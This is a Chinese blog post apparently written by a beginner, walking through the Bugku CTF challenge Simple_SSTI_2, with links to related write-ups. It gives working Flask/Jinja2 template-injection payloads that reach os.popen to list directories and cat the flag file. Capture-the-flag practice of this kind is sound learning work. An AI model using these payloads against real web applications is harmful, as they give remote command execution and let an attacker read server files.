ctf-bugku simple ssti2

最新推荐文章于 2024-09-02 15:08:01 发布
最新推荐文章于 2024-09-02 15:08:01 发布
阅读量312 收藏 2
点赞数 3
分类专栏: ctf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43256484/article/details/141334911
版权

新手尝试

此题内容同ssti,但是按照老样子进入F12审计后,未发现有效信息,利用惯性思想使用BP抓包未果(刚起步,只能一个一个试)。
只能题目评论区寻求大佬解答。

SSTI 模板注入

http://ip:port/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

其中,class:用来查看变量所属的类,init :初始化类,返回的类型是function,__globals__查看所处空间的属性,os.popen()方法:用于打开一个管道后返回对象。
总之,就是类-初始化对象-对象的功能与属性-打开管道后将对对象的功能属性输出。

进入文件目录后,发现异常:app文件夹在最前面,遂更改ls

http://ip:port/?flag={{ config.__class__.__init__.__globals__['os'].popen(‘ls ../app’).read() }}

找到flag

http://ip:port/?flag={{ config.__class__.__init__.__globals__['os'].popen(‘cat ../app/flag’).read() }}

学习源:(https://blog.csdn.net/qq_47480932/article/details/137423121?csdn_share_tail=%7B%22type%22:%22blog%22,%22rType%22:%22article%22,%22rId%22:%22137423121%22,%22source%22:%22qq_47480932%22%7D&fromshare=blogdetail)

我来试试水呀
关注
专栏目录
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 958
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
CTF-Bugku-WEB-Simple_SSTI_2
P5093的博客
06-06 200
可以看出是用的python的flask模板,开始构造语句进行注入。
BUGKU-WEB Simple_SSTI_2
天泽岁月
02-06 597
BUGKU-WEB Simple_SSTI_2
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5470
bugku-ctf
ctf-bugku simple ssti
weixin_43256484的博客
08-18 205
日常做题思路记录
CTF-BugKu-web-Simple_SSTI_1
qq_51145360的博客
09-02 246
获取,在配置文件中的参数都是大写的,且可以通过。题目提示了可以通过参数。Ctrl+U查看源码。
bugku--Simple_SSTI_1---2
qq_51802152的博客
12-14 567
bugku--Simple_SSTI_1---2
CTF-Bugku-WEB-Simple_SSTI_1
P5093的博客
06-02 197
直接在url后面输入:flag={{config.SECRET_KEY}}
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 896
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-Bugku-MISC-30
hahaHalsey的博客
09-08 1786
Bugku 杂项30道
BugKu CTFSimple_SSTI_2
weixin_42557264的博客
09-16 1932
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8487
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
南京工业大学在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-04
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
下单系统的Spnigboot和微信小程序实现(全栈微信小程式下单).zip
10-04
下单系统的Spnigboot和微信小程序实现(全栈微信小程式下单)
基于Java开发的智能文件管家设计源码
最新发布
10-04
该项目是一款基于Java的智能文件管家设计源码,涵盖102个文件,包括29个Java源文件、27个类文件、19个XML配置文件、10个YAML文件、8个列表文件、4个属性文件、4个JAR包文件以及1个Git忽略文件。该系统旨在提供高效便捷的文件管理解决方案。
基于YoloV8的简单目标检测和跟踪,使用KMNET进行鼠标移动(处理多目标移动抖动,处理鼠标平滑移动).zip
10-04
基于YoloV8的简单目标检测和跟踪,使用KMNET进行鼠标移动(处理多目标移动抖动,处理鼠标平滑移动)
基于Vue和JavaScript的心旅途个性化推荐旅游平台设计源码
10-04
本项目是一款基于Vue和JavaScript开发的心旅途个性化推荐旅游平台设计源码,整合了513个Java文件、76个PNG图片、70个XML配置文件、62个JavaScript文件、42个Vue组件文件、28个CSS样式文件、22个HTML文件、18个YAML配置文件、16个属性文件、11个Vue模板文件,总计919个文件。平台采用现代化前端技术堆栈,旨在为用户提供个性化的旅游推荐服务。
buu ctf web进阶]ssti
08-23
在buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值